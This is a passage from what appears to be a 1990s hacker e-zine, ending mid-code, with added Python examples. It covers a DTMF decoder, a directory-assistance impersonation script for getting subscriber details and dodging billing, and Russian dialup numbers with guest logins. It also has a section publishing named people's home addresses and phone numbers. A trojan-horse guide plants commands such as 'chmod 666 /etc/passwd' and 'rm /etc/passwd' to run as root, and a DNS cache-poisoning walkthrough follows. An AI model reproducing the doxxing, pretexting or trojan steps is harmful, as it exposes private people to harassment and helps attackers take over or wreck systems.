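    was_present, last_tone_end = False, None
    for t, status in samples:
        present = tone_present(status)
        if present and not was_present:
            if current and last_tone_end is not None and t - last_tone_end > GAP_SECONDS:
                numbers.append(current)
                current = ""
            current += decode_code(status)
        elif was_present and not present:
            last_tone_end = t
        was_present = present
    if current:
        numbers.append(current)
    return numbers

def encode_status(code, present):
    """Build the byte the port would read for a given code (used to construct samples)."""
    return ((code & 0x0F) << CODE_SHIFT) | (0 if present else DV_MASK)

def constructed_samples(dialled, start=0.0, gap=8.0):
    """Synthesise a sample stream: each key held 0.1 s, numbers separated by `gap` s."""
    code_of = {v: k for k, v in SYMBOLS.items()}
    samples, t = [], start
    for number in dialled:
        for sym in number:
            samples.append((t, encode_status(code_of[sym], True)))
            samples.append((t + 0.1, encode_status(0, False)))   # key released
            t += 0.3
        t += gap
    return samples

if __name__ == "__main__":
    print(decode_samples(constructed_samples(["0800", "*69"])))
```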

-------------------------------------------------------------------------------
2. Dealing with directory assistance operators : Qytpo
-------------------------------------------------------------------------------

All right, this information should be made available to everyone who cares
to read it. Any information used from this article is to be used at a
person's own risk. I will not be held responsible if any of this is used
for wrongful purposes (it can, you just have to get really creative).

Well, to start off, the job of the directory assistance operator is to
give out addresses, phone numbers, and area codes for the information
given to them. The operators can search from names, business names, and
government names. Despite what anyone tells you, an AT&T DIRECTORY
ASSISTANCE OPERATOR CAN DO A CNA SEARCH (Customer Name and Address).
If the particular operator says they can't, then bug them. Yell at them.
If they don't do it themselves, they will get their supervisor, and if you
make it sound really important they can do it. And if all that doesn't
work, try to find a naive operator, tell them you are an AT&T
administrator, and say to press (Control+C) to bring up a CNA search on
their switch. A CNA search is a very valuable asset; if you cannot find a
CNA operator, give a directory assistance operator a whirl. Chances are,
if you have a brain and are a decent actor, you can get the listing for
the number you give them.

Routing.

The calls are routed through a large mainframe in each state department.
How it works: say you dial 602-555-1212. That would put you through to an
operator ANYWHERE in the United States where Phoenix calls are routed
through to. It will not just appear in 602, although that is where it is
supposed to. If the switches in 602 are full, the call could end up
anywhere in the US.

When the operator picks up the receiver (it is actually a headset that
beeps), the call is automatically traced to whatever area code they
dialed. So if you dialed (602 555 1212), an operator anywhere in the US
would get a listing on their screen, and a default city in the upper left
hand corner [PHOE] (Phoenix, Arizona). [ *note*: depending on the area
code, 602 for example, the operator can search the area codes permitted in
that area code.]

For example, if you dialed 602-555-1212, the operator would be allowed to
search in 502 (the other area code in AZ). However, in some area codes
they will make you redial, like LA, or Texas, or New York;
they have so many area codes, for example 310 and 210 in Los Angeles.
If you wanted a listing for Los Angeles, and dialed 210-555-1212,
and wanted a listing for a city in Los Angeles which was 310, they would
make you hang up and dial 310-555-1212. (The operator
should be saying to himself/herself, "no, this kiddie needz to call 310
instead, or I get fired for giving out bad information"... if they have a
clue.)

Sample Call to a D A O for a CNA Search: ( The best way to get info )

( caller dials 555-1212 in area code )

<Operator > City please?
<Caller > Yes, this is James Thornton at AT&T the AT&T administrative
assistance office. I need you to do a CNA Search for me.
<Operator > I'm sorry sir, we're not permitted to do CNA searches.
<Caller > Yes, I know. May I speak to a supervisor?
<Supervisor> This is So and So supervisor, how can I help you sir?
<Caller > Yes, this is James Thornton down at the AT&T (also called Excel)
office in Florida, we need a CNA search done for a XXX-XXX-XXXX.
<Supervisor> One moment please.
<Caller > Ok.
<Supervisor> Ok, I am (or am not) showing a listing for XXX-XXX-XXXX,
would you like that listing sir?
<Caller > Yes please, and I would like that verbally. (If you time it just
right, you can get the info for free. If yer beige boxing, it
doesn't really make a difference tho.) - hang up, say "what" a few
times, to make it sound like you didn't get the listing, and hang up
before she finishes the second time. She can only bill you while
you are on the line, and if she fucks up, you can get away with it
with no bill while they read you the number. This method only
works for a verbal listing, if yer quick enough. ;)

- - - The NPA RULES. - - -

NPA dialed    NPAs permitted to search in from the NPA dialled

-----California----
213           213
209           408 510 707 916
408           209 510
415           510 707
510           209 408 415 707 916
707           209 415 510 916
714           714
916           209 510 707

-------Texas-------
210           512 915
214           817 903 972
281           409 713
409           281 512 713 817 903
512           210 409 817 915
713           281 409
806           817 915
817           214 409 512 806 903
903           214 409 817
915           210 512 806 817
972           214 817 903

-----New York------
212           718 914 917
315           518 607 716
516           718
518           315 607 914
607           315 518 716 914
716           315 607
718           212 518 914
914           212 518 607 718
917 (cell)    212 718 914

*note*: all other states can search all NPA's listed in that state.

- Qytpo (@#hackers on EFnet)

-------------------------------------------------------------------------------
3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik
-------------------------------------------------------------------------------

Some Interesting ph0ne #'s [07.06.97]
Have some real phun with these, they are up-to-date!@#

[RUSSiA] +7 095 XXXxxxx

-----------------------------------------------------------------------

AT&T Calling Cards Service

-----------------------------------------------------------------------

9740074 Tone System - AT&T Moscow HQ
switch to tone mode
press 0 to page operator
then press "1" to record your voice message
then press "2" & "3" to hear your recording :)

7555042 English-speaking AT&T operator
1555042 The automated AT&T calling system is also here (tone mode)

7555555 Russian-speaking AT&T operator
1555555 No AT&T Tone Machine !

-----------------------------------------------------------------------

Sprintnet Local Dial-Ups 02501 & 03110 DNICs
GlobalOne = Sprintnet = Telenet

-----------------------------------------------------------------------

9286344 9600
9280985 9600
9137166 9600 < Only for MAIL
5789119 2400
3428376 9600 real connect 2400
9167373 SprintNet V34-19200
9167272 ???
9167171 ?

00wait8 RoSprint PPP dialup.

-----------------------------------------------------------------------
ROSPAC Local Dial-Ups 02500 DNIC
-----------------------------------------------------------------------

9270003 9600
9563692 9600
9563690

-----------------------------------------------------------------------
Rosnet Dialups 02506 DNIC
-----------------------------------------------------------------------

975-8403
913-3571
921-2103
201-2030 Voice:(095)206-8570,206-8458,206-7238
442-6422
442-8277
442-7022
442-8388
442-7088
442-8577
442-8077
442-6477

Iskra-2:
20-906,33-571

-----------------------------------------------------------------------
IBM net Dial-Up
-----------------------------------------------------------------------

2586420

-----------------------------------------------------------------------
Russia@Online Dial-Ups 28.8Kbps
-----------------------------------------------------------------------

9132376 30 lines
2584120 60 lines
3619999
2584161 Voice phone !

-----------------------------------------------------------------------
InfoNet Euro
-----------------------------------------------------------------------

9150001 28.8
9150005 28.8
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]

2927056 Infonet Euro Voice !

-----------------------------------------------------------------------
Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} )
-----------------------------------------------------------------------

9563589 14400
[unpublished]
9676767 24400
9676730
9676731
9676732
9676733
9676734
9676735
9676755
9676759
9676763
9676766
9676784

9562455 SITA voice! phones
9564736

00wait5 ?p???????????? ????p STB Card.
00wait9 free information service

974 5122 Elvis+,Co Proxy 194.190.195.71.
961 5122 DNS 195.190.195.66.
SLIP login: iptest temp 192.168.12.1
PPP login: pptest
Password: guest

-----------------------------------------------------------------------
CentroNet DialUp www.astro.ru
-----------------------------------------------------------------------

7511704 14400

-----------------------------------------------------------------------
Infotel dialUps [02504]
-----------------------------------------------------------------------

9585475
9580226
9580825
9580575

-----------------------------------------------------------------------
MMTEL DialUPs [02503]
-----------------------------------------------------------------------

3371001 5 lines
2419860 .db
2418340
2461661

-----------------------------------------------------------------------
PTT-Teleport www.ptt.ru
-----------------------------------------------------------------------

946-9383 voice about x.25,28,etc
946-9393 modem PPP

-----------------------------------------------------------------------
www.dataforce.net
-----------------------------------------------------------------------

9566749 voice 2889340

-----------------------------------------------------------------------
FaxInfo Demo Tone Voice Line
-----------------------------------------------------------------------

9629424 demo user code : 12345

9759220 Telephone Voice Bulletin Board

-----------------------------------------------------------------------
Voice Mail boxes
-----------------------------------------------------------------------

7059285 leave me mail in 80718 box

9253503 Online registration 4 email
9253507

-----------------------------------------------------------------------
Strange #s :
-----------------------------------------------------------------------

2587474 Logon:
2586435
2586411
2586414
2586430
2586432
9269199

9500885

9563686

-----------------------------------------------------------------------
Demos 33.8 V34 HST
-----------------------------------------------------------------------

958-19-75
958-19-81
956-62-85
956-62-86
241-05-05
961-32-00

-----------------------------------------------------------------------
www.Cityline.ru V34
-----------------------------------------------------------------------

2587884 40 lines
9567759 20
2341901 10
2450070 10
2454414 10

9564787 Interport Mailbox ( t0ne )

9560050 Unknown system ( t0ne )

9585474 PassWord:

_always_ BUSY #s ( unplugged )
111-11xx
222-2222
980xxxxx
..
999xxxxx
-----------------------------------------------------------------------
INTEL PORT :
-----------------------------------------------------------------------

956-4787 Main
434-1565 Registration
202-6934 Demo

-----------------------------------------------------------------------
Dial-Ups
-----------------------------------------------------------------------

281-0201
975-0520
(37)

9270003 TYMUSA
956-3692 the same
956-0699 9600 Real Tymnet Voice 9563678
503/9563691 TYM-X25 Sync

-----------------------------------------------------------------------
Youth Science Center Linux server
-----------------------------------------------------------------------

Data lines: Line 1: 954-0664 (14400, 24h, UUPC only)
2: 954-0058 (14400, 21:00 - 09:00)
3: 954-0914 ( 9600, 21:00 - 09:00)
4: 954-0147 (33600, 24h, PPP only)
5: 954-0144 (33600, 24h, RAS only)
6: 954-0445 (33600, 24h, restricted)

Voice Dmitry Ablov 9540012

7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex

742xxxx Gate to Iskra2 line. Call for 8-097-2nodes
913xxxx Gate to Iskra2 line. Call for 8-097-3nodes

2324626 Comstar Dialup
2329696

9560885 "The Microsoft Network is no longer providing MSN in Russia"

-----------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=-
-----------------------------------------------------------------------

? Moscow #s

7473320 Rus MCI Operators in California
7473322 Eng, connect me to Customer Service in Russian
7473321 AT&T Operators in New York
7473323
7473324 Sprint Global, Arizona, USA
7473325 Orua, Canada
7473326 Otele Code ?
7473327 National Calling Center, UK
7473328
7473329 Japan
7473356 Sprint Calling Cards
7473357
7473359 France service
7473360
7473361 Italian service
7473363 Chile ? service

? National Russian #s
8-10 800 4977211 - ???( AT&T);
8-10 800 4977222 - ???( MCI);
8-10 800 4977255 - ???( Sprint) ;
8-10 800 4977220 - ???(MCI ????????????? ??????);
8-10 800 4977233 - ?????? (Teleglobe);
8-10 800 4977266 - ??????????????(BT);
8-10 800 4977277 - ??????????????( Mercury);
8-10 800 4977288 - ???????;
8-10 800 4977181 - ?????? ( KDD);
8-10 800 4974358 - ?????????( Telecom Finland);
8-10 800 4977032 - ??????? (Belgacom, ? ????????-?????? ????????);
8-10 800 4977212 - ??????? ( Belgacom, ????? ?????????);
8-10 800 4977039 - ?????? (Iritel);
8-10 800 4977353 - ???????? ( Telecom Ireland);
8-10 800 4977156 - ????;
8-10 800 4977165 - ????????;
8-10 800 4977141 - ?????????.

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. sIn inf0z part 3 : The CodeZero + Friends
???????????????????????????????????????????????????????????????????????????????

sIn are 0fficially property of the CodeZero.

-------------------------------------------------------------------------------

Alias : Evil Chick
Real Name : Suzette Kimminau
Address : 130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA

Telephone : (206)454-7176
Email : [email protected]

-------------------------------------------------------------------------------

Alias : \\StOrM\\
Real Name : Jason Sloderbeck
Address : 5739 N Norton,
Kansas City, MO 64119
USA

Telephone : (816)453-8722
Email : [email protected]

-------------------------------------------------------------------------------

Alias : JDKane
Real Name : Kim
Address : 327 E Park Road,
Round Lake, IL 60073
USA

Telephone : (847)546-9154
Email :

-------------------------------------------------------------------------------

Alias : JeNnYGrRl
Real Name : Jennifer Chambers
Address :
Kansas City, MO 61421
USA

Telephone :
Email :

-------------------------------------------------------------------------------

We got more, but not complete,

They can run, but they can never hide,

http://www.codez.com/inf0z.html

???????????????????????????????????????????????????????????????????????????????
2. The Codez That NASA Use : so1o
???????????????????????????????????????????????????????????????????????????????

w0wie, I got myself some eleet NASA system security juarez...And people have
leeched them from me, like lame undernet groups with no skill.

::: LaRCSCAN
::: NAIAD

---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have----------

(readme.larcscan)

The LaRCSCAN program is a working prototype rather than a finished
product, thus requiring a few explanations.

SETTING UP
----------

LaRCSCAN is a combination of fifty script and c-language files.
(No need to compile the c code, the scripts will do it ). To set up
to run LaRCSCAN create a directory LARCSCAN in the users home directory.
Copy LARCSCAN.tar into this directory.

Do a tar -xf LARCSCAN.tar.
This will create a 'project' directory containing all the script
and 'C' files.

Next create a directory 'LARCSCAN/data' .
In this directory you will create two files- 'hname1' and 'uname2'.
These should be plain ascii text files. The first (hname1) will
contain a list of all the target machine host names, one name per line.
Example:

viper
machine2
dumbo
(These may also use the longer format i.e. 'dumbo.larc.nasa.gov')

The second (uname2) should contain a list of standard vendor account
names you wish to check.
Example:

guest
tutor
4Dgifts
demo
demos
lp

There is an extensive list of these names in the file named 'acctlist'.
We normally run 6 to 8 of these each month, rotating through the list.
They are used in the 'rsh' attempts and using too many can cause the
process to be extremely slow.

Before running LaRCSCAN, there are several places code must be changed
to reflect the user, host and domain running the scan. The following
changes should be made:

FILE CURRENT TEXT REPLACEMENT
--- ----------- -----------

ftpsc 'jpark@bize' your username@your hostname
ftpss 'jpark@bize' your username@your hostname
getftp.sh 'jpark@bize' your username@your hostname
getftpss.sh 'jpark@bize' your username@your hostname

ftpsc '#local=larc.nasa.gov' '#local='your complete domain
ftpss '#local=larc.nasa.gov' '#local='your complete domain
hostsljc '#local=larc.nasa.gov' '#local='your complete domain
rshss '#local=larc.nasa.gov' '#local='your complete domain
rshsc '#local=larc.nasa.gov' '#local='your complete domain
shownlj '#local=larc.nasa.gov' '#local='your complete domain

line.c 'strncmp(pl.hdr,"larc",n)' substitute the site portion of
your domainname (lerc,arc,jpl,etc)
for 'larc'

These changes are necessary in order for your results to be accurate.
The C code is compiled (by the script files) using cc with the -o
(next token is output file) option. If this compiler is not used on
the scanning machine, you should be able to substitute the appropriate
compiler command and option. Compilation occurs from:

exec1.sh
exec2.sh
rshsc
rshss
shownlj

RUNNING LaRCSCAN
----------------

LaRCSCAN can take quite a while (days) to run to completion, so it is
recommended that it be run in the background. We do this either
with crontab starting it at a specified time/date or through the use of
'nohup'. The command that starts the process is 'sh tst1.sh' (in the
project directory). The necessary subdirectories and files will be
created as needed.

RESULTS
-------

The first report (LARCSCAN/result/result.db) is a summary of the
results from each target machine. It starts with the date the scan
began and the total number of target hosts. The next line is the
column header line, containing the following abbreviations:

HTNAME - hostname
HUK - host known (is the hostname an active host)
TFTP-trivial ftp (is the trivial ftp utility active on this host)
FTP-anonymous ftp (is anonymous ftp active on this host)
There can be several valid responses in this column.
No-anonymous ftp is not active
Yes_No-anonymous ftp is active but no password file was captured.
Yes_Yes-anonymous ftp is active and a password file
was captured.
ALIAS-were the 'decode' or 'uudecode' aliases present in the
aliases file
SDM-was the 'wiz' password present in the sendmail.cf file
SHADOW-was the captured password file a shadow password file.
N/A used when no password file was captured.
(This is the only instance where 'Yes' is a desired result)

+LINE-Indicates a single '+' on a line by itself in the
hosts.equiv file

The second report (LARCSCAN/result/result2.db) is a list of all hosts
found to have accounts with no password, followed by the unprotected
account names. The ACCTS_OFF and OFF columns will be used to represent
hosts.equiv entries that are located off-site and target hosts located
off-site. Currently these entries are not valid!

The last report (LARCSCAN/result/resultr1.db ) contains a list of all
file systems exportable to the world.

Any specific questions or problems may be sent via E-mail to
[email protected].

(readme.naiad)

The NASIRC Automated Inode Anomaly Detector (NAIAD)
---------------------------------------------------
Copyright 1996 Hughes STX Corporation

This software was developed by Hughes STX Corporation for the National
Aeronautics and Space Administration under contract NAS5-30440. An
unlimited license for use within NASA is granted. Hughes STX
Corporation makes no representation concerning the suitability of this
software for any particular purpose. It is provided "as is" without
express or implied warranty of any kind.

Author: Fred Blonder <[email protected]>

NAIAD will traverse a specified directory and all its sub-directories,
looking for files meeting certain built-in criteria. If no directory
is specified, it starts at the current directory. Its purpose is to
find evidence of attempted or actual system tampering. The tests
performed cannot easily be performed by existing system commands such
as "find". NAIAD is intended to be used in conjunction with such
programs and checksumming programs.

The tests NAIAD performs are:

* Check for file names containing unprintable characters. These are
sometimes used to hide illicit programs, or the output from them.
They are also frequently created by fumble-fingered users, and are
not necessarily a sign of a problem.

Optionally, naiad will rename the file to something easier to type on
a normal keyboard.

* List symbolic links, or just symbolic links to files whose name
begins with a period. The exploitation of security holes in some
programs involves placing symbolic links into a spool directory.
NAIAD will help locate links in unexpected places.

* Lists old files whose inode has been altered recently. Some
malicious programs attempt to hide the fact that they have altered a
file by using the "utime" system call to alter the "last modified"
time of the file. The inode also contains the "inode changed" time,
which is not modifiable by this call; thus a file which has been
tampered to display an old modification time will still have a recent
"inode changed" time. Of course, this can also be caused by someone
using the "chmod" command. There are two parameters associated with
this: the "window" is the amount of time within which the
modification times may differ without being flagged, (default is 30
minutes, which can be changed); and "cutoff", which is the time
within which the inode must have been modified for the file to have
been flagged (default is to not show files whose inodes have not been
modified in the last week, which can be changed).

* Lists device files which are not under the /dev hierarchy, or ordinary
files that are.

* Lists any files or directories whose mtime, atime or ctime are later than
the current system time.

* Lists files which contain user-specified search-strings. This is
similar to the command:

find . -exec grep <string> '{}' ';' -print

but a little more efficient because there isn't a process started for
each file, and naiad can be made to search only part of each file.

The output format is:

MMM mmm iiiiiiiiii xxxxxxxxxxxxx: "<filename>"

...where "MMM" is the major device number, "mmm" is the minor device
number, "iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment,
and "<filename>" is the pathname of the file. There may be additional
information appended to the line.

You will probably want to run as super-user so that NAIAD can access
the entire file system. It is passive, and will not alter anything it
finds.

More detailed information may be found in the "naiad.1" file, which is
part of the naiad tarfile.

---These Are The *EXACT* Files Taken From The nasa.zip.gz I have---------------

So, looks as if NASA has some pretty neato detection juarez to use, I wouldn't
advise anyone to hack any *.nasa.gov system without knowing how to obtain root
and having mad skills to counter-act these security measures, you have been
warned.

so1o.
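The NAIAD readme above lists the checks but not the code, so here is a small scanner in the same spirit. This is an added example written for this edition, not part of nasatool.zip.gz or any NASA / Hughes STX code; the check tags, the constants and the sample tree it plants in a temp directory are this example's own assumptions. The case worth watching is the utime(2) backdating trick the readme describes: mtime is pushed 60 days into the past, but ctime cannot be set from user space, so the inode still gives the game away.

```python
import os
import stat
import tempfile
import time

# The two NAIAD tunables from the readme: a file is flagged when its ctime is
# more than WINDOW seconds newer than its mtime and the ctime itself falls
# within CUTOFF seconds of "now".
WINDOW = 30 * 60
CUTOFF = 7 * 24 * 3600
FUTURE_SLACK = 60   # tolerate a little clock skew before calling a stamp "future"


def has_unprintable(name):
    """Control characters or bytes outside printable ASCII in a file name."""
    return any(ord(c) < 32 or ord(c) > 126 for c in name)


def scan(root, now=None, window=WINDOW, cutoff=CUTOFF):
    """Walk `root` with lstat (never following links) and return NAIAD-style findings.

    Each finding is a dict with the (major, minor) device pair, the inode, a short
    comment tag and the path; format_finding() renders it like NAIAD's output line.
    """
    now = time.time() if now is None else now
    findings = []

    def flag(st, path, tag):
        findings.append({"dev": (os.major(st.st_dev), os.minor(st.st_dev)),
                         "inode": st.st_ino, "comment": tag, "path": path})

    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if has_unprintable(name):
                flag(st, path, "unprintable-name")
            if stat.S_ISLNK(st.st_mode):
                # a link into a spool dir that points at a dotfile is the classic abuse
                if os.path.basename(os.readlink(path)).startswith("."):
                    flag(st, path, "symlink-to-dotfile")
            is_dev = stat.S_ISCHR(st.st_mode) or stat.S_ISBLK(st.st_mode)
            if is_dev and not path.startswith("/dev/"):
                flag(st, path, "device-outside-dev")
            elif path.startswith("/dev/") and stat.S_ISREG(st.st_mode):
                flag(st, path, "regular-file-in-dev")
            # utime(2) can backdate mtime/atime but never ctime, so a freshly
            # touched inode wearing an old mtime deserves a look (chmod does the
            # same, which is why the window exists).
            if st.st_ctime - st.st_mtime > window and now - st.st_ctime < cutoff:
                flag(st, path, "backdated-mtime")
            if max(st.st_mtime, st.st_atime, st.st_ctime) > now + FUTURE_SLACK:
                flag(st, path, "future-timestamp")
    return findings


def format_finding(f):
    """Render one finding in the 'MMM mmm iiii comment: "path"' shape NAIAD uses."""
    major, minor = f["dev"]
    return '%3d %3d %10d %s: "%s"' % (major, minor, f["inode"], f["comment"], f["path"])


def build_sample_tree(base):
    """Constructed test tree (not real evidence): one clean file plus four planted anomalies."""
    now = time.time()
    with open(os.path.join(base, "ok.txt"), "w") as fh:
        fh.write("clean\n")
    backdated = os.path.join(base, "backdated.txt")
    with open(backdated, "w") as fh:
        fh.write("modified, then utime()d to look 60 days old\n")
    old = now - 60 * 86400
    os.utime(backdated, (old, old))            # mtime/atime go back, ctime does not
    future = os.path.join(base, "future.txt")
    with open(future, "w") as fh:
        fh.write("stamped one day ahead\n")
    os.utime(future, (now + 86400, now + 86400))
    with open(os.path.join(base, "evil\x07.txt"), "w") as fh:
        fh.write("name contains BEL\n")
    os.symlink(".rhosts", os.path.join(base, "link"))   # dangling link to a dotfile
    return base


def demo():
    """Build the sample tree in a temp dir, scan it, return {(basename, tag)}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {(os.path.basename(f["path"]), f["comment"]) for f in scan(tmp)}


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in scan(tmp):
            print(format_finding(finding))
```

Run it as root on a real tree so it can see all of /dev (the device-node checks cannot be exercised in a temp directory without mknod privileges); like NAIAD it is passive and only reads.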

???????????????????????????????????????????????????????????????????????????????
3. Rooting From Bin : so1o
???????????????????????????????????????????????????????????????????????????????

This is something I was thinking a lot about the other day, I was on a System V
Release 4, I had just performed the chkperm exploit, which only gives
bin access (uid=1 and gid=1) to the system, so even though I own all the
files in the /bin/ directory, I am still not root. Here is a very very simple
technique I developed for such occasions, this may come in useful one day for
someone, somewhere...

Write a program that you can get people to run, you could get hold of the
source for a common program, such as su or who or mount. Put this line in
it somewhere:

if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks whether the person running your program logged in as root. Note
that getlogin() returns the name from the utmp entry for the terminal (or NULL
if there is none), not the effective uid, so an admin who logs in as himself
and then does su to root will not match; he is root, but the check does not see
it. When the test passes, you can have him execute any shell command you'd
like. Here are some suggestions:

"chmod 666 /etc/passwd"

/etc/passwd is the system's password file, owned by root. Normally everyone
can read it (the passwords are stored hashed, or moved out to a shadow file)
but only root can write to it. Take a look at it and see how it's formatted
if you don't know already. This command makes it possible for you to write
to the file, i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

By adding yourself to some high-access groups, you can open many doors.

"chmod 666 /usr/lib/uucp/L.sys"

Look for this file on your system if it is on the uucp net. It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it. Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.

"rm /etc/passwd"

If you can get root to execute this command the system's passwd file will be
removed, nobody (root included) will be able to log in, and it will stay that
way until someone restores it from backup. This is very destructive and evil,
but pointless; if you do want to damage a system, at least use your
imagination.

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow. If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them. As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked. If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system. Your modification will remain dormant until he
runs it. If you can't find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal. It can't hurt to learn C as it's a
great language. We've just seen what it can do on a UNIX system. Once you've
caught the root (i.e. you can now modify the /etc/passwd file) remove the
spurious code from your trojan horse program and you'll never be caught.

so1o.

???????????????????????????????????????????????????????????????????????????????
4. DNS Spoofing : so1o
???????????????????????????????????????????????????????????????????????????????

You can now use a new DNS spoofing technique originally developed by johan,
I have seen this technique often applied to IRC, and prym was one of the first
to use the technique for that purpose.

Here is a basic introduction into the DNS concept.
--------------------------------------------------

DNS stands for Domain Name System (the machines that serve it are nameservers);
you may also hear it wrongly called Dynamic Name Server. Nameservers exist so
that instead of everyone having to know numeric IPs for their websites and
shit, a client can 'resolve' a name (eatme.com for example) to its numeric IP.

Basically, a DNS server is a computer running a nameserver daemon (BIND's
'named' on most Unix boxes) listening on UDP port 53, with TCP 53 used for
zone transfers and oversized answers. When a new domain is set up it is
registered with the InterNIC, and the root/.com servers InterNIC runs then
tell anyone who asks which nameservers have authority over that domain.

For example say 1.2.3.4 wanted to resolve the address for peachie.com and
1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric
IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over
peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7
would ask ns.peachie.com what the numeric IP for peachie.com was.
Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com
was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the
name would be resolved.

DNS servers cache the records their clients look up. So if 1.2.3.4 asked
1.3.3.7 for peachie.com again, 1.3.3.7 would not go back to Internic etc.;
it would hand back the 4.3.2.1 it resolved earlier. The funny part is that an
old nameserver doesn't do a lot of checking on a reply from another
nameserver: it caches every record in the reply, including records in the
'additional' section for names the replying server has no authority over, and
it hands them to clients just as it would records it looked up itself. That
is what makes the spoof below possible, but you first need to control a
nameserver that is authoritative for some domain (at the least, root on a box
where you can bind port 53), which is one of the biggest setbacks...

How to spoof your DNS.
----------------------

Let's say we're sitting on ns.peachie.com with root, and we have authority
for all of peachie.com. We want to cache our box's address, 2.2.2.2, on the
remote nameserver ns.eatme.org so that we can connect to eatme.org with the
address of trusted.eatme.org. We could write a program that listens for DNS
queries and replies with false information. Sitting on ns.peachie.com we
would look up peachie.com on the nameserver ns.eatme.org. ns.eatme.org would
ask Internic who had authority for peachie.com and it would reply to
ns.eatme.org that ns.peachie.com had authority over peachie.com. Then
ns.eatme.org would ask ns.peachie.com what the address for peachie.com was.

If we were running a normal DNS it would tell ns.eatme.org that the
address for peachie.com was 4.3.2.1, but we aren't. Instead ns.peachie.com
answers the question and tacks on two extra records: that the reverse of
2.2.2.2 is trusted.eatme.org, and that the address for trusted.eatme.org is
2.2.2.2. This exploits the nameserver's failure to check that those extra
records belong to the zone it was asking about.

Basically ns.eatme.org asked what the numeric IP for peachie.com was and we
told it, on the side, that the reverse of 2.2.2.2 is trusted.eatme.org and
that the IP of trusted.eatme.org is 2.2.2.2. It asked one question and we
slipped in two answers to entirely different questions. Now we simply connect
to eatme.org from 2.2.2.2; eatme.org asks ns.eatme.org for the reverse of
2.2.2.2, finds trusted.eatme.org in the cache and gets that answer. Then it
asks for the address of trusted.eatme.org and gets 2.2.2.2, so the forward
check agrees with the reverse. You are now connected to eatme.org as
trusted.eatme.org as far as its .rhosts and hosts.equiv are concerned, and
that, in effect, is DNS spoofing.

That's all there is to it, it may be a bit heavy for some people. Two things
worth knowing: the double lookup eatme.org does (reverse, then forward, then
compare) does not protect it here, because we planted both records; and
nameservers from BIND 4.9.3 onwards only cache additional records that fall
inside the zone the answering server is authoritative for ('bailiwick'
checking), which kills this trick against a patched ns.eatme.org.

so1o
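The exchange above, as an added example that is not from so1o's article or from any real nameserver code: a toy resolver cache that ingests the rogue reply from ns.peachie.com once with no checks and once with a bailiwick check, then runs the reverse-then-forward comparison an rlogind would do. Names and addresses are the ones in the article; the RR/Response layout and the `server_zone` argument are this example's simplifications (a real resolver derives the bailiwick from the delegation it followed, not from a parameter).

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class RR:
    """A minimal resource record: owner name, type and rdata, all as strings."""
    name: str
    rtype: str   # "A" or "PTR" is all this toy needs
    rdata: str


@dataclass
class Response:
    qname: str
    qtype: str
    answers: List[RR]
    additional: List[RR]


def reverse_name(ip: str) -> str:
    """2.2.2.2 -> 2.2.2.2.in-addr.arpa, the owner name of its PTR record."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"


def in_bailiwick(name: str, zone: str) -> bool:
    """True when `name` is `zone` or lies beneath it (www.peachie.com in peachie.com)."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


class Cache:
    """A resolver cache with the credibility check switched on or off."""

    def __init__(self, check_bailiwick: bool):
        self.check_bailiwick = check_bailiwick
        self.rrs: Dict[Tuple[str, str], str] = {}

    def ingest(self, resp: Response, server_zone: str) -> List[RR]:
        """Cache a reply from the server authoritative for `server_zone`.

        Returns the records discarded as out-of-bailiwick (none when unchecked).
        """
        rejected = []
        for rr in resp.answers + resp.additional:
            if self.check_bailiwick and not in_bailiwick(rr.name, server_zone):
                rejected.append(rr)
                continue
            self.rrs[(rr.name.lower(), rr.rtype)] = rr.rdata
        return rejected

    def lookup(self, name: str, rtype: str) -> Optional[str]:
        return self.rrs.get((name.lower(), rtype))


def rlogind_would_trust(cache: Cache, client_ip: str, trusted_host: str) -> bool:
    """The r-service check: reverse-map the client IP, forward-map the name, compare."""
    host = cache.lookup(reverse_name(client_ip), "PTR")
    if host is None:
        return False
    return host.lower() == trusted_host.lower() and cache.lookup(host, "A") == client_ip


def poisoned_response() -> Response:
    """Constructed reply from the rogue ns.peachie.com to 'A peachie.com?'."""
    return Response(
        qname="peachie.com", qtype="A",
        answers=[RR("peachie.com", "A", "4.3.2.1")],
        additional=[
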